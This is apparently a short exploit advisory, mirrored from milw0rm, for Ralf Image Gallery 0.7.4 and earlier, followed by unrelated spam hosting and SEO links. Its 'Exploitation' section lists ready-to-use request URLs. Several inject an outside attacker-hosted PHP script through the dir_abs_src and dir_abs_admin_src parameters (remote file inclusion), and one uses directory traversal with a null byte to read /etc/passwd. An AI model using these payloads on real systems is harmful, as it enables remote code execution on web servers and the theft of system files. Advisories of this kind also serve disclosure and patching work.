Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory traversal Vulnerabilities ----------------------------------------------------------------- Vendor: RIG is developed and maintained by Le R'alf URL: http://rig.powerpulsar.com/ ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ----------------------------------------------------------------- Exploitation: ----------------------------------------------------------------- /check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php? /check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00 /admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php? /admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php? /admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php? # milw0rm.xmc.pl [8x16*32^n]
Polish:
Webdeveloper |
Probably the best hosting company Interserver
SEO Shop:
Multi-quality SEO links |
Best Proxy Service.
Group: xmc.pl